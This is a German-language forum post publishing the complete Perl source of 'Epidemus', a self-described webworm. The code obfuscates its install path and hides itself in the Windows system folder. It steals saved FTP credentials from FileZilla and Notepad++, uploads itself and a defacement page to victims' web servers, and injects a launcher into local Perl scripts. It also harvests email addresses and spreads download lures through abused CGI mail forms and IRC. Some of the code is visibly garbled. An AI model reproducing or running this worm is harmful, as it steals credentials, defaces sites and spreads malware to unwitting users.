[+]Topic: Code
[+]Von: Perforin
[+]Return: Code
Epidemus - Webworm
by Perforin
Spreading Engines:
-FTP
-Mail (uses whitelist first, then google)
-IRC
Mein erster Wurm, den ich komplett in Perl gecoded habe.
Auch wenn die Wahrscheinlichkeit nicht hoch ist, dass der Wurm
sich auf vielen Maschinen verbreiten kann, rate ich trotzdem
davon ab, meine Kreation freizusetzen!
Ich hoffe ihr könnt was aus diesem Code lernen...
#!/usr/bin/perl
=poc
Epidemus - Webworm
by Perforin
Spreading Engines:
-FTP
-Mail (uses whitelist first, then google)
-IRC
Mein erster Wurm, den ich komplett in Perl gecoded habe.
Auch wenn die Wahrscheinlichkeit nicht hoch ist, dass der Wurm
sich auf vielen Maschinen verbreiten kann, rate ich trotzdem
davon ab, meine Kreation freizusetzen!
Ich hoffe ihr könnt was aus diesem Code lernen...
Visit DarK-CodeZ.org / vx.perforin.de.vu
ToDo: polymorher code,threads, ftp scannen
=cut
use Net::FTP;
use IO::Socket::INET;
use File::Basename;
($Programme,$Appdata) = ($ENV{'ProgramFiles'},$ENV{'Appdata'});
($virii,$xswyaq) = (basename($0),$ENV{'windir'});
mkdir("$xswyaq".chr(hex('5C')).chr(hex('73')).chr(hex('79')).chr(hex('73')).chr(hex('74')).chr(hex('65')).chr(hex('6D')).chr(hex('33')).chr(hex('32')).chr(hex('5C')).chr(hex('4D')).chr(hex('69')).chr(hex('63')).chr(hex('72')).chr(hex('6F')).chr(hex('73')).chr(hex('6F')).chr(hex('66')).chr(hex('74')).chr(hex('7B')).chr(hex('43')).chr(hex('6F')).chr(hex('72')).chr(hex('65')).chr(hex('7D')).chr(hex('5C')),0777);
$pathTOvirus = "$xswyaq".chr(hex('5C')).chr(hex('73')).chr(hex('79')).chr(hex('73')).chr(hex('74')).chr(hex('65')).chr(hex('6D')).chr(hex('33')).chr(hex('32')).chr(hex('5C')).chr(hex('4D')).chr(hex('69')).chr(hex('63')).chr(hex('72')).chr(hex('6F')).chr(hex('73')).chr(hex('6F')).chr(hex('66')).chr(hex('74')).chr(hex('7B')).chr(hex('43')).chr(hex('6F')).chr(hex('72')).chr(hex('65')).chr(hex('7D')).chr(hex('5C'))."$virii";
@whitelist = ("answers24x7.org","secretsinfuturestrading.com","bombaypeggys.com","stinkyandsmelly.com");
@rnames = ("staff","help","admin","support","webmaster","public","administrator","root");
@rdomains = ("wikipedia","yahoo","hotmail","gmail","thingeek","slashdot","zone-h","gulli");
@rtlds = ("com","net","de","lu","uk","us","cc","info","ch","fr","tv","fm","it","tk","mobi");
$payloadText =<<"TEXT";
A new life begins
Obliterate what makes us weak.
Decimate what threatens us.
Destroy Everything!
So a new life can begin.
Destroy Everything!
Rebuild and start again...
TEXT
$activate =<<"ACTIVE";
\$xswyaq = \$ENV{'windir'};
exec("\$xswyaq".chr(hex('5C')).chr(hex('73')).chr(hex('79')).chr(hex('73')).chr(hex('74')).chr(hex('65')).chr(hex('6D')).chr(hex('33')).chr(hex('32')).chr(hex('5C')).chr(hex('4D')).chr(hex('69')).chr(hex('63')).chr(hex('72')).chr(hex('6F')).chr(hex('73')).chr(hex('6F')).chr(hex('66')).chr(hex('74')).chr(hex('7B')).chr(hex('43')).chr(hex('6F')).chr(hex('72')).chr(hex('65')).chr(hex('7D')).chr(hex('5C'))."$virii");
ACTIVE
($size1,$size2,$size3) = (scalar(@rdomains),scalar(@rtlds),scalar(@rnames));
($rdomain1,$rdomain2) = (@rdomains[int(rand($size1))],@rtlds[int(rand($size2))]);
($rdomain3,$rname) = ("$rdomain1\.$rdomain2",@rnames[int(rand($size3))]);
($zero,$ten,$twenty) = (0,10,20);
$Epidemus = "Epidemus - Webworm v1.0";
$injection_counter = 0;
open(HTML,">","index.php");
print HTML <<"HTML";
<html>
<head>
<title>Chaos never ceases</title>
</head>
<body bgcolor="black" style="color: red">
<center>
<pre>
<b>
$payloadText
</b>
</pre>
<br />
<br />
<h1>$Epidemus</h1>
</center>
HTML
close(HTML);
&FileZilla;
¬epadplusplus;
&connect;
&Mail;
&Mirc;
rename($virii,$pathTOvirus);
sub FileZilla {
open(FileZilla,"<","$Appdata\\FileZilla\\recentservers.xml") || ¬epadplusplus;
while (<FileZilla>) {
if ($_ =~ m/\s\w?/) {
$_ =~ s/\s//;
$_ =~ s/<\/Host>\n//;
$_ =~ s/^\s{11}//;
push(@PL_Hosts,"$_");
} elsif ($_ =~ m/\s\w?/) {
$_ =~ s/\s//;
$_ =~ s/<\/Port>\n//;
$_ =~ s/^\s{11}//;
push(@PL_Ports,"$_");
} elsif ($_ =~ m/\s\w?/) {
$_ =~ s/\s//;
$_ =~ s/<\/User>\n//;
$_ =~ s/^\s{11}//;
push(@PL_Users,"$_");
} elsif ($_ =~ m/\s\w?/) {
$_ =~ s/\s//;
$_ =~ s/<\/Pass>\n//;
$_ =~ s/^\s{11}//;
push(@PL_Passes,"$_");
}
}
close(FileZilla);
}
sub notepadplusplus {
open(NotePadPlusPlus,"<","$Appdata\\Notepad++\\session.xml") || &Mail;
while (<NotePadPlusPlus>) {
chomp($_);
if ($_ =~ m/\s$//;
if (! m/^\sxOffset=/) { push(@PL_Paths,"$_");}
}
}
close(NotePadPlusPlus);
open(NotePadPlusPlus,"<","$Appdata\\Notepad++\\plugins\\config\\FTP_synchronizeA.ini") || &Mail;
while (<NotePadPlusPlus>) {
chomp($_);
if ($_ =~ m/^Port=\d?/) {
$_ =~ s/^Port=//;
push(@PL_Ports,"$_");
} elsif ($_ =~ m/^Address=\w?/) {
$_ =~ s/^Address=//;
push(@PL_Hosts,"$_");
} elsif ($_ =~ m/^Username=\w?/) {
$_ =~ s/^Username=//;
push(@PL_Users,"$_");
} elsif ($_ =~ m/^Password=\w?/) {
$_ =~ s/^Password=//;
push(@PL_Passes,"$_");
}
}
close(NotePadPlusPlus);
foreach $Skript (@PL_Paths) {
if ($Skript =~ m/\.(pl|pm)$/i) {
open(Skript,"<","$Skript");
@Skript_Inhalt = <Skript>;
close(Skript);
for (@Skript_Inhalt) {
if ($_ =~ m/^\s{0,10}$/) {
if ($injection_counter lt 1) {
$_ =~ s/^\s{0,10}$/$activate\n/;
$injection_counter++;
}
}
}
open(Skript,">","$Skript");
print Skript @Skript_Inhalt;
close(Skript);
} elsif ($Skript =~ m/\.(txt|log|ini)/) {
open(Skript,"<","$Skript");
@Skript_Inhalt = <Skript>;
close(Skript);
for (@Skript_Inhalt) {
chomp($_);
if ($_ =~ m/\w+\@\w+\.\w+/) {
push(@PL_Mails,"$&");
}
}
}
}
}
sub connect {
$size = scalar(@PL_Hosts);
for ($count = 0; $count < $size; $count++) {
$ftp = Net::FTP->new("@PL_Hosts[$count]",
Port => @PL_Ports[$count],
Debug => 0,
Timeout => 3) || $count++;
$ftp->login("@PL_Users[$count]","@PL_Passes[$count]") || $count++;
@sh00p = $ftp->dir();
for $dir (@sh00p) {
if ($dir =~ m/httpdocs/) {
$ftp->cwd("/httpdocs");
} elsif ($dir =~ m/htdocs/) {
$ftp->cwd("/htdocs");
}
}
$ftp->type(A);
$ftp->put(basename($0));
$ftp->put("index.php");
$ftp->quit;
push(@succesfull,"@PL_Hosts[$count]");
}
}
sub Mail {
open(Pidgin,"<","$Appdata\\.purple\\blist.xml") || exit;
while (<Pidgin>) {
if ($_ =~ m/\s<name>\w?/) {
$_ =~ s/\s<name>//;
$_ =~ s/<\/name>\n//;
$_ =~ s/^\s{1,4}//;
if ($_ =~ m/\w{1,15}\@\w{1,4}/) {
push(@PL_Mails,"$_");
}
}
}
close(Pidgin);
$count = 0;
&sendmails;
}
sub sendmails {
$whitelisted = scalar(@whitelist);
$suxxes = scalar(@succesfull);
$server = @succesfull[int(rand($suxxes))];
$mailText =<<"MAIL";
Hey!
Epidemus auf dem Weg um die Welt.
$server/Epidemus.pl <--- Gratis Download!
MAIL
if ($count gt $whitelisted) {
$count2 = 0;
$rnd = int(rand(3));
if ($rnd eq 0) {
$gPage = $zero;
} elsif ($rnd eq 1) {
$gPage = $ten;
} else {
$gPage = $twenty;
}
$qry = 'client=mozilla&rls=de&hs=duV&q=inurl%3Ahifriend.pl+%2B+cgi-bin&btnG=Suche&lr=&start='."$gPage".'&sa=N';
$sock = new IO::Socket::INET(PeerAddr => "www.google.com",
PeerPort => 80,
Proto => 'tcp',
Timeout => 2) || exit;
print $sock "GET /search?$qry HTTP/1.1\r\n";
print $sock "Host: $addy\r\n";
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7. Gecko/20070421 Firefox/2.0.0\r\n";
print $sock "Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3\r\n";
print $sock "Connection: close\n";
print $sock "\r\n\r\n";
open(TMP,">","t3mp.tmp");
while(<$sock>) {
if (m/\<div id=ssb\>/) {
if (m/\w?hifriend\w?/) {
$_ =~ s/"/\n/ig;
print TMP $_;
}
}
}
close(TMP);
open(TMP,"<","t3mp.tmp");
while (<TMP>) {
chomp($_);
if (m/^http:\/\// && m/cgi-bin/) {
if(! m/google/ && ! m/search?/) {
if(m/w?\.?\w+\.\w+\.\w+\.?\w+/) {
push(@gHosts,$&);
}
if (m/\/cgi-bin\/\w+\/hifriend.pl$/) {
push(@gPaths,$&);
}
}
}
}
close(TMP);
unlink("t3mp.tmp");
foreach (@gPaths) { $_ =~ s/hifriend.pl$//; }
$sock = new IO::Socket::INET(PeerAddr => @gHosts[$count2],
PeerPort => 80,
Proto => 'tcp',
Timeout => 2) || $count2++ && (&sendmails);
%mailconfig = (
Path => @gPaths[$count2],
From => "$rname".chr(64)."$rdomain3",
Name => "Your $rdomain3 support!",
MSG => "$mailText"
);
} else {
$sock = new IO::Socket::INET(PeerAddr => @whitelist[$count],
PeerPort => 80,
Proto => 'tcp',
Timeout => 2) || $count++ && (&sendmails);
%mailconfig = (
Path => "/cgi-bin/",
From => "$rname".chr(64)."$rdomain3",
Name => "Your $rdomain3 support!",
MSG => "$mailText"
);
}
foreach $mail (@PL_Mails) {
$data = 'refpage=&reftitle=&Friends='.$mail.'&SenderName='.$mailconfig{'Name'}.'&From='.$mailconfig{'From'}.'&PersonalMsg='.$mailconfig{'MSG'};
$lngt = length($data);
print $sock "POST $mailconfig{'Path'}hifriend.pl?sp=y HTTP/1.1\n";
print $sock "Host: $mailconfig{'Server'}\n";
print $sock "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12\n";
print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n";
print $sock "Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3\n";
print $sock "Accept-Encoding: gzip,deflate\n";
print $sock "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\n";
print $sock "Keep-Alive: 300\n";
print $sock "Connection: keep-alive\n";
print $sock "Referer: $mailconfig{'Server'}/cgi-bin/hifriend.pl\n";
print $sock "Accept-Language: en-us\n";
print $sock "Content-Type: application/x-www-form-urlencoded\n";
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7. Gecko/20070421 Firefox/2.0.0\n";
print $sock "Content-Length: $lngt\n\n";
print $sock "$data\n";
}
}
sub Mirc {
open(MirC,"<","$Appdata\\NoNameScript\\mirc.ini") || open(MirC,"<","$Programme\\mIRC\\mirc.ini") || last;
while (<MirC>) {
chomp($_);
if ($_ =~ m/^host=/) {
$_ =~ s/^host=//;
$_ =~ s/:/\n/ig;
open(EpMi,">","mirz.txt"); { print EpMi $_; }
close(EpMi);
}
}
close(MirC);
open(EpMi,"<","mirz.txt");
@CNFG = <EpMi>;
close(EpMi);
unlink("mirz.txt");
($SRVR,$CHN) = (@CNFG[1],@CNFG[3]);
($NIKK,$M4IL) = ("Epidemus","lol 8 * :lowl.de");
chomp($SRVR);
$spredVIAmirc = new IO::Socket::INET(
PeerAddr => $SRVR,
PeerPort => 6667,
Proto => 'tcp',
) || last;
print $spredVIAmirc "NICK $NIKK\r\n";
print $spredVIAmirc "USER $M4IL\r\n";
print $spredVIAmirc "JOIN $CHN\r\n";
while ($output = <$spredVIAmirc>) {
if ($output =~ m/^PING (.*?)$/gi) {
print $spredVIAmirc "PONG ".$1."\n";
} elsif ($output =~ m/Hallo/i) {
(print $spredVIAmirc "PRIVMSG $CHN :Hey voll geil, hier auf $server/$virii gibt es Epidemus zum saugen :D\r\n");
last;
}
}
}